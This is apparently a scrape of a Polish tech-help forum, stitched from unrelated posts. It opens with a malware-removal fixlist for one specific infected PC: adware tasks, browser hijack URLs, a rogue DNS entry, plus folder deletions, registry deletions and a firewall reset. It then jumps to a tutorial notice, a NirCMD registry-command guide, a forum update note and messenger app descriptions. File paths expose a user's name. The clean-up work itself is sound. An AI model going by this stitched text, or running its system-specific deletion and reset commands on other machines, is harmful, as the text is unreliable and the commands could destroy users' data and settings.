\??\C:\PROGRA~2\YTDOWN~1\sbmntr.sys [X] S2 seconohozbt; C:\Program Files (x86)\158ACBD8-1452615913-1520-0220-181505000000\knsk57A2.tmpfs [X] S1 wwfd_vw_1_10_0_24; system32\drivers\wwfd_vw_1_10_0_24.sys [X] Task: {019210E3-BDC0-4AB9-8BFC-4A8F5FC4CDB7} - System32\Tasks\ca072e45-2445-4f8b-9bc4-cc60930924ce-1-7 => C:\Program Files (x86)\MyBrowser 1.0.2V28.09\ca072e45-2445-4f8b-9bc4-cc60930924ce-1-7.exe Task: {22B86AC2-4065-46D3-A2E1-6163FD703DED} - System32\Tasks\0da6bfa5-e479-4ed0-b385-40a75e9c742a-4 => C:\Program Files (x86)\iWebar\0da6bfa5-e479-4ed0-b385-40a75e9c742a-4.exe Task: {232B956D-E10B-44AB-BD42-D157DFB81F98} - System32\Tasks\globalUpdateUpdateTaskMachineCore => C:\Program Files (x86)\globalUpdate\Update\globalupdate.exe [2015-09-29] (globalUpdate) Task: {2D529CEF-F28F-4621-A2E0-EF9A8B6E4A10} - System32\Tasks\{F18E81DC-98FB-410B-886E-D0090F5E9BA8} => pcalua.exe -a "C:\Users\jan zbylut\AppData\Roaming\yoursearching\UninstallManager.exe" -c -ptid=face Task: {416E8688-058D-4A68-8D91-16ABF1ACDA14} - System32\Tasks\globalUpdateUpdateTaskMachineUA => C:\Program Files (x86)\globalUpdate\Update\globalupdate.exe [2015-09-29] (globalUpdate) Task: {45D63C47-0FC1-42A5-960D-64FCC354E448} - System32\Tasks\ca072e45-2445-4f8b-9bc4-cc60930924ce-7 => C:\Program Files (x86)\MyBrowser 1.0.2V28.09\ca072e45-2445-4f8b-9bc4-cc60930924ce-7.exe Task: {470F7249-CD9D-4244-8B3B-EFD5F2A987D2} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 => C:\Program Files (x86)\Lenovo\Customer Feedback Program\Lenovo.TVT.CustomerFeedback.Agent.exe [2015-07-08] (Lenovo) Task: {4C9E03FF-6E46-4380-A113-DB5BFDBA9514} - System32\Tasks\WarThunder sun => Chrome.exe hxxp://mmotraffic.com/catalog/goplay/1000932/MTE3NjYvLy8xMDAwOTMy?click_id=0Dzz0C0Bzz0AtCyDtDtB0B0F0CyB0Bzy2RtBtDtCyCtDtCtCtBtCyBtBtAyDzzzztCyE Task: {55EC6994-4448-49C4-B359-2B9BF53E621D} - System32\Tasks\ba0a975d-fd56-4589-ba28-336d850eb289-4 => C:\Program Files (x86)\Object Browser\ba0a975d-fd56-4589-ba28-336d850eb289-4.exe Task: {6903DFC2-5454-48AD-BC08-84779BF85FBC} - System32\Tasks\{29A30F65-52D2-4E5F-BC5A-B9B92D172210} => pcalua.exe -a "C:\Users\jan zbylut\AppData\Roaming\WarThunder\Uninstaller.exe" -c /Run /ePN:0W1T1C0T1M2Y1G1Q1P1C Task: {84F89C12-4372-4EC4-AE73-0A70B3B79CAD} - System32\Tasks\ca072e45-2445-4f8b-9bc4-cc60930924ce-5 => C:\Program Files (x86)\MyBrowser 1.0.2V28.09\ca072e45-2445-4f8b-9bc4-cc60930924ce-5.exe Task: {86539689-7848-4F7B-BC24-8E9EBE459A9B} - System32\Tasks\B3E61tPtVn47uuZL => C:\Users\jan zbylut\AppData\Roaming\B3E61tPtVn47uuZL.exe Task: {8AB557E2-579C-47A0-96AA-964A940C9246} - System32\Tasks\RegClean Pro_DEFAULT => C:\Program Files (x86)\RCP\RegCleanPro.exe [2015-11-20] () Task: {901D5CBE-C728-4A72-8C3B-FCB5A1DBEB12} - System32\Tasks\RegClean Pro_UPDATES => C:\Program Files (x86)\RCP\RegCleanPro.exe [2015-11-20] () Task: {92AA6B11-D520-4F6B-A9AA-2E1A6B5D8C72} - System32\Tasks\RegClean Pro => C:\Program Files (x86)\RCP\RegCleanPro.exe [2015-11-20] () Task: {97C019D1-409B-4C59-B12C-B977C525D682} - System32\Tasks\dyiW8SkJkHKa3QZVSe5fzW1 => C:\Users\jan zbylut\AppData\Roaming\dyiW8SkJkHKa3QZVSe5fzW1.exe Task: {A7AC412A-FD93-4F1D-91CC-8E556AFA32E9} - System32\Tasks\ca072e45-2445-4f8b-9bc4-cc60930924ce-1-6 => C:\Program Files (x86)\MyBrowser 1.0.2V28.09\ca072e45-2445-4f8b-9bc4-cc60930924ce-1-6.exe Task: {C38C07E1-65A8-4742-A21E-4D31DF769C7C} - System32\Tasks\ca072e45-2445-4f8b-9bc4-cc60930924ce-6 => C:\Program Files (x86)\MyBrowser 1.0.2V28.09\ca072e45-2445-4f8b-9bc4-cc60930924ce-6.exe Task: {C4CDF852-FC3C-47BB-8A8D-AB7D925616E2} - System32\Tasks\ca072e45-2445-4f8b-9bc4-cc60930924ce-11 => C:\Program Files (x86)\MyBrowser 1.0.2V28.09\ca072e45-2445-4f8b-9bc4-cc60930924ce-11.exe Task: {EE6556B7-39C4-4F0E-A624-4D7BD433FF23} - System32\Tasks\ca072e45-2445-4f8b-9bc4-cc60930924ce-10_user => C:\Program Files (x86)\MyBrowser 1.0.2V28.09\ca072e45-2445-4f8b-9bc4-cc60930924ce-10.exe Task: {F39F111E-81E3-4E99-89F9-0EAD37BFE76B} - System32\Tasks\Noeith => C:\Program Files\groover120120161726\Ticfii.bat [2016-01-12] () Task: {F5B9ECB7-A8C6-4615-BCE8-53B8A4BEF65F} - System32\Tasks\ca072e45-2445-4f8b-9bc4-cc60930924ce-5_user => C:\Program Files (x86)\MyBrowser 1.0.2V28.09\ca072e45-2445-4f8b-9bc4-cc60930924ce-5.exe Task: {F84FB133-6AE0-4538-A5AA-627BC4D4C42C} - System32\Tasks\VBxkAOccrKkOKbcgLRqr0w => C:\Users\jan zbylut\AppData\Roaming\VBxkAOccrKkOKbcgLRqr0w.exe Task: {FDC29FCC-2E2C-4922-A03E-97DC04EE4827} - System32\Tasks\ca072e45-2445-4f8b-9bc4-cc60930924ce-3 => C:\Program Files (x86)\MyBrowser 1.0.2V28.09\ca072e45-2445-4f8b-9bc4-cc60930924ce-3.exe Task: {FEF3923C-D4EB-4CAB-8420-278036EE4B9D} - System32\Tasks\ca072e45-2445-4f8b-9bc4-cc60930924ce-4 => C:\Program Files (x86)\MyBrowser 1.0.2V28.09\ca072e45-2445-4f8b-9bc4-cc60930924ce-4.exe Task: C:\Windows\Tasks\0da6bfa5-e479-4ed0-b385-40a75e9c742a-4.job => C:\Program Files (x86)\iWebar\0da6bfa5-e479-4ed0-b385-40a75e9c742a-4.exe Task: C:\Windows\Tasks\B3E61tPtVn47uuZL.job => C:\Users\jan zbylut\AppData\Roaming\B3E61tPtVn47uuZL.exe Task: C:\Windows\Tasks\ba0a975d-fd56-4589-ba28-336d850eb289-4.job => C:\Program Files (x86)\Object Browser\ba0a975d-fd56-4589-ba28-336d850eb289-4.exe Task: C:\Windows\Tasks\ca072e45-2445-4f8b-9bc4-cc60930924ce-1-6.job => C:\Program Files (x86)\MyBrowser 1.0.2V28.09\ca072e45-2445-4f8b-9bc4-cc60930924ce-1-6.exe Task: C:\Windows\Tasks\ca072e45-2445-4f8b-9bc4-cc60930924ce-1-7.job => C:\Program Files (x86)\MyBrowser 1.0.2V28.09\ca072e45-2445-4f8b-9bc4-cc60930924ce-1-7.exe Task: C:\Windows\Tasks\ca072e45-2445-4f8b-9bc4-cc60930924ce-10_user.job => C:\Program Files (x86)\MyBrowser 1.0.2V28.09\ca072e45-2445-4f8b-9bc4-cc60930924ce-10.exe Task: C:\Windows\Tasks\ca072e45-2445-4f8b-9bc4-cc60930924ce-11.job => C:\Program Files (x86)\MyBrowser 1.0.2V28.09\ca072e45-2445-4f8b-9bc4-cc60930924ce-11.exe Task: C:\Windows\Tasks\ca072e45-2445-4f8b-9bc4-cc60930924ce-3.job => C:\Program Files (x86)\MyBrowser 1.0.2V28.09\ca072e45-2445-4f8b-9bc4-cc60930924ce-3.exe Task: C:\Windows\Tasks\ca072e45-2445-4f8b-9bc4-cc60930924ce-4.job => C:\Program Files (x86)\MyBrowser 1.0.2V28.09\ca072e45-2445-4f8b-9bc4-cc60930924ce-4.exe Task: C:\Windows\Tasks\ca072e45-2445-4f8b-9bc4-cc60930924ce-5.job => C:\Program Files (x86)\MyBrowser 1.0.2V28.09\ca072e45-2445-4f8b-9bc4-cc60930924ce-5.exe Task: C:\Windows\Tasks\ca072e45-2445-4f8b-9bc4-cc60930924ce-5_user.job => C:\Program Files (x86)\MyBrowser 1.0.2V28.09\ca072e45-2445-4f8b-9bc4-cc60930924ce-5.exe Task: C:\Windows\Tasks\ca072e45-2445-4f8b-9bc4-cc60930924ce-6.job => C:\Program Files (x86)\MyBrowser 1.0.2V28.09\ca072e45-2445-4f8b-9bc4-cc60930924ce-6.exe Task: C:\Windows\Tasks\ca072e45-2445-4f8b-9bc4-cc60930924ce-7.job => C:\Program Files (x86)\MyBrowser 1.0.2V28.09\ca072e45-2445-4f8b-9bc4-cc60930924ce-7.exe Task: C:\Windows\Tasks\dyiW8SkJkHKa3QZVSe5fzW1.job => C:\Users\jan zbylut\AppData\Roaming\dyiW8SkJkHKa3QZVSe5fzW1.exe Task: C:\Windows\Tasks\globalUpdateUpdateTaskMachineCore.job => C:\Program Files (x86)\globalUpdate\Update\globalupdate.exe Task: C:\Windows\Tasks\globalUpdateUpdateTaskMachineUA.job => C:\Program Files (x86)\globalUpdate\Update\globalupdate.exe Task: C:\Windows\Tasks\RegClean Pro_DEFAULT.job => C:\Program Files (x86)\RCP\RegCleanPro.exe Task: C:\Windows\Tasks\RegClean Pro_UPDATES.job => C:\Program Files (x86)\RCP\RegCleanPro.exe Task: C:\Windows\Tasks\VBxkAOccrKkOKbcgLRqr0w.job => C:\Users\jan zbylut\AppData\Roaming\VBxkAOccrKkOKbcgLRqr0w.exe HKLM\...\Run: [spaceSoundPro] => "C:\Program Files\SpaceSoundPro\SpaceSoundPro.exe" HKLM-x32\...\Run: [mbot_pl_014010096] => [X] HKLM-x32\...\Run: [YTDownloader] => "C:\Program Files (x86)\YTDownloader\YTDownloader.exe" /boot HKLM-x32\...\Run: [gmsd_pl_005010096] => [X] HKLM-x32\...\Run: [gmsd_pl_005010099] => [X] HKLM-x32\...\Run: [gmsd_pl_005010100] => [X] HKLM-x32\...\Run: [pcmgr] => C:\Program Files (x86)\ppt\Uninst.exe [1571296 2015-12-28] (Tencent) HKLM-x32\...\Run: [gmsd_pl_005010205] => [X] HKLM-x32\...\Run: [rec_en_77] => [X] HKLM-x32\...\Run: [gmsd_pl_005010206] => "C:\Program Files (x86)\gmsd_pl_005010206\gmsd_pl_005010206.exe" HKLM-x32\...\Run: [rec_pl_165] => C:\Program Files (x86)\rec_pl_165\rec_pl_165.exe [3971760 2016-01-12] () HKU\S-1-5-21-3451131124-2045846987-1590504244-1001\...\Run: [YTDownloader] => "C:\Program Files (x86)\YTDownloader\YTDownloader.exe" /boot HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\QQPCRTP => ""="service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McNaiAnn => ""="" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\QQPCRTP => ""="service" Tcpip\..\Interfaces\{851C1639-84A9-464F-A95C-7282616F255D}: [NameServer] 104.197.191.4 Tcpip\..\Interfaces\{8718928D-CBEB-45EA-A621-800A9249001D}: [NameServer] 104.197.191.4 Tcpip\..\Interfaces\{bbed3e08-0b41-11e3-8249-806e6f6e6963}: [NameServer] 104.197.191.4 Tcpip\..\Interfaces\{F3AC42BE-3F0F-499D-97FB-B7A0A5A6EF00}: [NameServer] 104.197.191.4 GroupPolicy: Ograniczenia - Chrome CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia CHR HomePage: Default -> hxxp://www.yoursearching.com/?type=hp&ts=1452697748&z=97cf28955f2f614ef5b8bf7g8zcw8odqat1m1m6c2c&from=face&uid=ST1000DX001-1CM162_Z1DDFG7HXXXXZ1DDFG7H CHR StartupUrls: Default -> "hxxp://www.yoursearching.com/?type=hp&ts=1452697748&z=97cf28955f2f614ef5b8bf7g8zcw8odqat1m1m6c2c&from=face&uid=ST1000DX001-1CM162_Z1DDFG7HXXXXZ1DDFG7H" CHR DefaultSearchURL: Default -> hxxp://yoursearching.com/web?type=ds&ts=1452697748&z=97cf28955f2f614ef5b8bf7g8zcw8odqat1m1m6c2c&from=face&uid=ST1000DX001-1CM162_Z1DDFG7HXXXXZ1DDFG7H&q={searchTerms} CHR DefaultSearchKeyword: Default -> yoursearching StartMenuInternet: Google Chrome - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe hxxp://www.yoursearching.com/?type=sc&ts=1452616477&z=2db385cea86b3a172d26b44gezdw5o2q6g5qaz4q3c&from=face&uid=ST1000DX001-1CM162_Z1DDFG7HXXXXZ1DDFG7H FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2012-10-01] (Microsoft Corporation) FF Plugin-x32: @staging.google.com/globalUpdate Update;version=10 -> C:\Program Files (x86)\globalUpdate\Update\1.3.25.0\npglobalupdateUpdate4.dll [2015-09-29] (globalUpdate) FF Plugin-x32: @staging.google.com/globalUpdate Update;version=4 -> C:\Program Files (x86)\globalUpdate\Update\1.3.25.0\npglobalupdateUpdate4.dll [2015-09-29] (globalUpdate) FF HKLM\...\Firefox\Extensions: [{D78EE6B5-6E54-4197-89C8-C5122A5EFAC0}] - C:\Program Files\groover120120161726\Firefox\{D78EE6B5-6E54-4197-89C8-C5122A5EFAC0}.xpi FF HKLM-x32\...\Firefox\Extensions: [deskCutv2@gmail.com] - C:\Users\jan zbylut\AppData\Roaming\Mozilla\Firefox\Profiles\6tjmahkh.default\extensions\deskCutv2@gmail.com FF HKLM-x32\...\Firefox\Extensions: [defsearchp@gmail.com] - C:\Users\jan zbylut\AppData\Roaming\Mozilla\Firefox\Profiles\6tjmahkh.default\extensions\defsearchp@gmail.com => nie znaleziono FF HKLM-x32\...\Firefox\Extensions: [{D78EE6B5-6E54-4197-89C8-C5122A5EFAC0}] - C:\Program Files\groover120120161726\Firefox\{D78EE6B5-6E54-4197-89C8-C5122A5EFAC0}.xpi StartMenuInternet: FIREFOX.EXE - C:\Program Files (x86)\Mozilla Firefox\firefox.exe hxxp://www.yoursearching.com/?type=sc&ts=1452616477&z=2db385cea86b3a172d26b44gezdw5o2q6g5qaz4q3c&from=face&uid=ST1000DX001-1CM162_Z1DDFG7HXXXXZ1DDFG7H HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.istartsurf.com/web/?type=ds&ts=1443365481&z=b0f89b5a33c2dfe676cfcb8g8zfzdc9c2qdw0zbbbg&from=cor&uid=st1000dx001-1cm162_z1ddfg7hxxxxz1ddfg7h&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.istartsurf.com/web/?type=ds&ts=1443365481&z=b0f89b5a33c2dfe676cfcb8g8zfzdc9c2qdw0zbbbg&from=cor&uid=st1000dx001-1cm162_z1ddfg7hxxxxz1ddfg7h&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.istartsurf.com/web/?type=ds&ts=1443365481&z=b0f89b5a33c2dfe676cfcb8g8zfzdc9c2qdw0zbbbg&from=cor&uid=st1000dx001-1cm162_z1ddfg7hxxxxz1ddfg7h&q={searchTerms} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.istartsurf.com/web/?type=ds&ts=1443365481&z=b0f89b5a33c2dfe676cfcb8g8zfzdc9c2qdw0zbbbg&from=cor&uid=st1000dx001-1cm162_z1ddfg7hxxxxz1ddfg7h&q={searchTerms} HKU\S-1-5-21-3451131124-2045846987-1590504244-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.bing.com/search?q={searchTerms} HKU\S-1-5-21-3451131124-2045846987-1590504244-1001\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://www.bing.com/search?q={searchTerms} HKU\S-1-5-21-3451131124-2045846987-1590504244-1001\Software\Microsoft\Internet Explorer\Main,SearchAssistant = hxxp://www.bing.com/search?q={searchTerms} HKU\S-1-5-21-3451131124-2045846987-1590504244-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.gazeta.pl/0,0.html?p=182&d=20151206 SearchScopes: HKLM -> DefaultScope - brak wartości SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = SearchScopes: HKLM-x32 -> ielnksrch URL = hxxp://www.bing.com/search?q={searchTerms} SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-21-3451131124-2045846987-1590504244-1001 -> DefaultScope {3672D504-4E65-4A9B-8153-E40B027FA20E} URL = SearchScopes: HKU\S-1-5-21-3451131124-2045846987-1590504244-1001 -> {3672D504-4E65-4A9B-8153-E40B027FA20E} URL = SearchScopes: HKU\S-1-5-21-3451131124-2045846987-1590504244-1001 -> {ielnksrch} URL = hxxp://www.bing.com/search?q={searchTerms} BHO-x32: Treasure Track -> {1ef422df-c387-4f0d-88d1-b75bdfd51013} -> C:\Program Files (x86)\Treasure Track\Extensions\1ef422df-c387-4f0d-88d1-b75bdfd51013.dll => Brak pliku StartMenuInternet: IEXPLORE.EXE - c:\program files\internet explorer\iexplore.exe hxxp://www.yoursearching.com/?type=sc&ts=1452616477&z=2db385cea86b3a172d26b44gezdw5o2q6g5qaz4q3c&from=face&uid=ST1000DX001-1CM162_Z1DDFG7HXXXXZ1DDFG7H DeleteKey: HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I DeleteKey: HKCU\Software\dobreprogramy DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Lenovo C:\Program Files (x86)\158ACBD8-1452615913-1520-0220-181505000000 C:\Program Files (x86)\ExploreTech C:\Program Files (x86)\globalUpdate C:\Program Files (x86)\iWebar C:\Program Files (x86)\Lenovo C:\Program Files (x86)\MyBrowser 1.0.2V28.09 C:\Program Files (x86)\Object Browser C:\Program Files (x86)\ppt C:\Program Files (x86)\RayDld C:\Program Files (x86)\SFK C:\Program Files (x86)\Tencent C:\Program Files (x86)\YTDownloader C:\Program Files (x86)\Mozilla Firefox\plugins C:\Program Files\Common Files\Tencent C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat C:\ProgramData\kingsoft C:\ProgramData\Tmp0x0x C:\ProgramData\Tencent C:\ProgramData\TXQMPC C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acer Games.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GAMESDESKTOP C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Metal Gear Solid V The Phantom Pain C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RegClean Pro C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZipper C:\Users\jan zbylut\AppData\Local\158ACBD8-1452620144-1520-0220-181505000000 C:\Users\jan zbylut\AppData\Local\158ACBD8-1452619562-1520-0220-181505000000 C:\Users\jan zbylut\AppData\Local\9919 C:\Users\jan zbylut\AppData\Local\globalUpdate C:\Users\jan zbylut\AppData\Local\Lenovo C:\Users\jan zbylut\AppData\Local\PPTAssist C:\Users\jan zbylut\AppData\Local\SmartWeb C:\Users\jan zbylut\AppData\Local\Tempfolder C:\Users\jan zbylut\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A} C:\Users\jan zbylut\AppData\LocalLow\Company C:\Users\jan zbylut\AppData\Roaming\atb C:\Users\jan zbylut\AppData\Roaming\NetService C:\Users\jan zbylut\AppData\Roaming\software C:\Users\jan zbylut\AppData\Roaming\kingsoft C:\Users\jan zbylut\AppData\Roaming\Tencent C:\Users\jan zbylut\AppData\Roaming\TSv C:\Users\jan zbylut\AppData\Roaming\yoursearching C:\Users\jan zbylut\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WarThunder.lnk C:\Users\jan zbylut\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ASPackage C:\Users\jan zbylut\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BeamNG-Techdemo-0.3 C:\Users\jan zbylut\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\YTDownloader C:\Users\jan zbylut\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\腾讯软件 C:\Users\jan zbylut\Desktop\oss\Révoquer la licence.lnk C:\Users\jan zbylut\Downloads\*.crdownload C:\Users\jan zbylut\Downloads\Firmware_Installer [1].exe C:\Users\jan zbylut\Downloads\Setup Installer (Right Click and select extract).rar C:\Users\jan zbylut\Downloads\tp5v88cr.exe C:\Windows\system32\roboot64.exe C:\Windows\system32\teik C:\Windows\system32\Drivers\{3240e2a0-4814-4f5d-9251-29a88a1c9b80}Gw64.sys C:\Windows\system32\Drivers\bsdriver.sys C:\Windows\system32\Drivers\cherimoya.sys C:\Windows\system32\Drivers\TFsFltX64.sys C:\Windows\system32\Tasks\Lenovo C:\Windows\SysWOW64\netupdsrv.exe Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v YTDownloader /f Reg: reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run32 /v YTDownloader /f CMD: netsh advfirewall reset EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z menu Notatnika > Plik > Zapisz jako > wprowadź nazwę fixlist.txt > Kodowanie zmień na UTF-8 Plik fixlist.txt umieść obok narzędzia FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, system zostanie zresetowany. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Uruchom RepairDNS. Na Pulpicie powstanie log RepairDNS.txt. 3. Deinstalacje: Klawisz z flagą Windows + X > Programy i funkcje > odinstaluj: AnySend, Body Text Feathering, eBay Worldwide, GamesDesktop 008.005010206, Games-desktop Maintenance 008.165, groover, McAfee WebAdvisor, MPC Cleaner, Norton Online Backup, OffersWizard Network System Driver, RegClean Pro, Setup, Software Version Updater, WarThunder, WinZipper. Uruchom narzędzie Microsoftu: KLIK. Zaakceptuj > Wykryj problemy i pozwól mi wybrać poprawki do zastosowania > Odinstalowywanie > zaznacz na liście wpisy globalupdate Helper, Metric Collection SDK, Metric Collection SDK 35 > Dalej. Narzędzie nie umożliwia akcji hurtowej, więc należy je uruchomić trzy razy. Uruchom z poziomu Trybu awaryjnego McAfee Consumer Product Removal Tool. Jeśli coś nie będzie się dało odinstalować, kontynuuj dalej. 4. Wyczyść przeglądarki: Firefox: Odłącz synchronizację (o ile włączona): KLIK. Menu Pomoc > Informacje dla pomocy technicznej > Odśwież program Firefox. Zakładki i hasła nie zostaną naruszone. Menu Historia > Wyczyść całą historię przeglądania. Google Chrome: Zresetuj synchronizację (o ile włączona): KLIK. Ustawienia > karta Rozszerzenia > odinstaluj Avast SafePrice, SiteAdvisor, AdBlock Pro. Ustawienia > karta Ustawienia > Pokaż ustawienia zaawansowane > zjedź na sam spód i uruchom opcję Resetowanie ustawień. Zakładki i hasła nie zostaną naruszone. Ustawienia > karta Ustawienia > sekcja Szukaj > klik w Zarządzanie wyszukiwarkami > skasuj z listy wszystko poza Google. 5. Zrób nowy log FRST z opcji Skanuj (Scan), ponownie z Addition, ale już bez Shortcut. Dołącz też pliki fixlog.txt i RepairDNS.txt.

Tutorial został przepisany od zera. Dodane wątki uruchamiania spod WinRE oraz opis narzędzia SFCFix. Przy okazji, ogłoszenie działów Windows ze zbyt dużą ilością danych jest w fazie rozbijania na osobne tutoriale, na razie wydzieliłam odświeżone instrukcje tyczące BSOD.

NirCMD Strona domowa Platforma: Windows XP do Windows 10 32-bit i 64-bit Licencja: freeware NirCMD - Multifunkcyjne narzędzie konsolowe ułatwiające wykonywanie określonych czynności systemowych, lokalnie lub zdalnie. Pełny zestaw komend opisany w dokumentacji. Jedną z wielu funkcji jest możliwość operacji na systemowym rejestrze, aczkolwiek zredukowana do podstawowych czynności, są tu tylko odpowiedniki dla REG ADD i REG DELETE narzędzia Microsoftu. W kontekście operacji na rejestrze są obsługiwane następujące polecenia: regdelkey (usuwanie kluczy, ale tylko nie posiadających podkluczy), regdelval (usuwanie wartości), regsetval (dodawanie / modyfikacja wartości), regedit (automatyczne otwieranie regedit na konkretnej ścieżce). Komendy usuwania mogą się przydać w sytuacji, gdy nie działają systemowe edytory regedit i reg.exe (np. zablokowane przez malware). Składnia poleceń: nircmd regdelkey [klucz] Przykład: nircmd regdelkey "HKEY_CURRENT_USER\Software\Test" nircmd regdelval [klucz] [nazwa wartości] Przykład: nircmd regdelval "HKEY_CURRENT_USER\Software\Test" "Nowa wartość" nircmd regsetval [typ] [klucz] [nazwa wartości] [dane wartości] Przykład: nircmd regsetval dword "HKEY_CURRENT_USER\Software\Test" "Nowa wartość" "0xaabbccdd" Aplikacja portable dostępna w osobnych wersjach 32-bit oraz 64-bit. W paczce są dwie kompilacje narzędzia różniące się formą dostarczania komunikatów o błędach: nircmd.exe (komunikaty okienkowe) i nircmdc.exe (komunikaty przekierowanie do konsoli). Uruchomienie tej pierwszej przez tradycyjny dwuklik podaje małe okno dialogowe z opcją kopiowania narzędzia do katalogu systemowego Windows, co spowoduje brak konieczności wpisywania pełnej ścieżki do nircmd w wierszu polecenia czy plikach batch.

Forum zostało zaktualizowane do wersji IPB 3.4.9. To drobna aktualizacja wykonana w ekspresowym tempie, głównie z zabezpieczeniami, nie powinno być żadnych widocznych zmian. Ale jak zwykle proszę o zgłaszanie ewentualnie zauważonych błędów.

Facebook Chat | Messenger Strona domowa: https://www.facebook.com/ / https://www.messenger.com/ Opis zlokalizowany w początkowej części tematu. VK Messenger Strona domowa: https://vk.com/messenger VK Messenger - Komunikator rosyjskiego serwisu społecznościowego vk.com (bardziej popularny niż zbanowany Facebook). Dostępny po zalogowaniu w serwisie lub jako aplikacja desktopowa linkowana powyżej.

Komunikatory portali społecznościowych

Trillian Free Strona domowa: https://www.trillian.im/ Platforma: Windows, Linux, macOS, platformy mobilne Licencja: darmowa / adware (uprzednio nieszkodliwe reklamy + wtręty w instalatorze, np. wcześniej Ask Toolbar ----> nie wiem jaki jest stan w 2025) Trillian - (Multi?)komunikator działający w oparciu o własny protokół i usługi zapewniające unifikowany login dla wszystkich kont i synchronizację ustawień. Własne rozwiązanie to nie tylko tunel do obsługi innych protokołów, ale także uprzywilejowana sieć komunikacyjna z najszerszą pulą opcji. Wymogiem użytkowania komunikatora jest rejestracja konta w sieci Trillian. Wersja dla Windows ma dwa główne wydania: darmowe oraz płatne (Pro i wyższe plany dla biznesu). Historia ewolucji wersji darmowej: Trillian 6 - Najnowsza edycja w zupełnie nowej odsłonie interfejsu, dopasowanej do look and feel Windows 10, już bez wsparcia XP. W kwestii obsługi protokołów, wątpliwe by program w roku 2025 obsługiwał cokolwiek innego niż sieć własną oraz XMPP. Przykładowo, uprzednio obsługiwane przez Trillian ICQ to już historia. Podejrzewam, że w stanie obecnym używanie programu ma sens tylko w obrębie zamkniętej sieci własnej. Poniższy opis jest stary. Informacje o komunikatorze i jego aktualizacjach dostępne na blogu.